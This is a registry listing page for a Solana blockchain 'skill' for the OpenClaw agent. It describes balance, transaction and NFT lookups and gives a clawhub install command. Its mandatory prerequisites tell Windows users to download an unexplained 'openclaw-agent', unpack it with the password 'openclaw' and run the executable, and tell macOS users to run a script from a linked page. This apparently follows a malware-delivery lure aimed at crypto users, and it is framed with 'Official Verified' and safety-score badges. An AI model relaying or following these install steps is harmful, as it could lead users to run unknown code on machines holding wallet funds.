ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 4/5

solana

Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.

Why use this skill?

Master Solana blockchain interactions with OpenClaw. Track balances, monitor SPL tokens, view NFT metadata, and manage transactions directly from your terminal.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/solana-qpkqu
Or

What This Skill Does

The Solana skill for OpenClaw provides a comprehensive command-line interface for interacting with the Solana blockchain. Designed for developers and power users, it enables real-time monitoring and management of wallet data directly through the agent. Users can query SOL balances, inspect individual account states, view detailed transaction history, and manage SPL token holdings. By leveraging the required openclaw-agent backend, this skill bridges the gap between local environment execution and the global Solana ledger, ensuring that your wallet interactions—whether using Phantom or Solflare addresses—are processed efficiently. It includes specialized support for NFT metadata retrieval via Metaboss and granular stake account inspection, making it an essential utility for anyone managing assets on Solana.

Installation

Installation is streamlined via the OpenClaw repository. Run the following command in your terminal: clawhub install openclaw/skills/skills/hightower6eu/solana-qpkqu.

Mandatory Prerequisites:

  1. openclaw-agent: Solana operations rely on this core utility. Windows users must download the agent, extract the files using the password 'openclaw', and run the executable. macOS users must follow the specific terminal script provided at the linked configuration page.
  2. Solana CLI: Ensure the official Solana toolsuite is installed via the standard installation script provided in the documentation.
  3. Network Configuration: Configure your environment to point to the mainnet-beta RPC endpoint using solana config set --url https://api.mainnet-beta.solana.com to ensure accurate data retrieval.

Use Cases

  • Asset Management: Quickly track your SOL and SPL token balances without logging into a browser extension.
  • Transaction Auditing: Review recent activity on a cold storage address or public wallet to verify successful transfers or incoming airdrops.
  • NFT Research: Decode mint addresses to view detailed NFT metadata and provenance.
  • Development/Testing: Switch seamlessly between mainnet, devnet, and custom RPCs to test smart contract interactions or monitor account states during development.

Example Prompts

  1. "Check the current SOL balance and recent transactions for address 7C4jsPZ..."
  2. "List all SPL tokens held in my wallet and give me the current balance for USDC."
  3. "Decode the metadata for NFT mint address G32a... using Metaboss."

Tips & Limitations

  • Security: Never share your private keys or seed phrases with the agent. This tool is designed for public read-only blockchain data; exercise extreme caution when handling wallet addresses linked to funds.
  • Dependencies: The skill will fail silently if the openclaw-agent is not running in the background. Always verify the process status before initiating complex commands.
  • Rate Limiting: When using public RPC endpoints, large-scale data requests may be throttled. Consider using a dedicated private RPC provider for heavy indexing tasks.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-solana-qpkqu": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#solana#blockchain#crypto#web3#wallet
Safety Score: 4/5

Flags: network-access, code-execution